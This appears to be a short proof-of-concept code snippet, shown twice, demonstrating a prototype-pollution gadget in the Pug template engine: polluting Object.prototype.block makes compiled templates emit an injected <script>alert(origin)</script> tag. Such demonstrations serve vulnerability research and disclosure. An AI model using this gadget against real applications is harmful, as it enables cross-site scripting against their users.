rayepeng/untitled snippet.js

## untitled snippet.js
const pug = require('pug');

Object.prototype.block = {"type":"Text","val":`<script>alert(origin)</script>`};

const source = `h1= msg`;

var fn = pug.compile(source, {});
var html = fn({msg: 'It works'});

console.log(html); // <h1>It works<script>alert(origin)</script></h1>
	const pug = require('pug');

	Object.prototype.block = {"type":"Text","val":`<script>alert(origin)</script>`};

	const source = `h1= msg`;

	var fn = pug.compile(source, {});
	var html = fn({msg: 'It works'});

	console.log(html); // <h1>It works<script>alert(origin)</script></h1>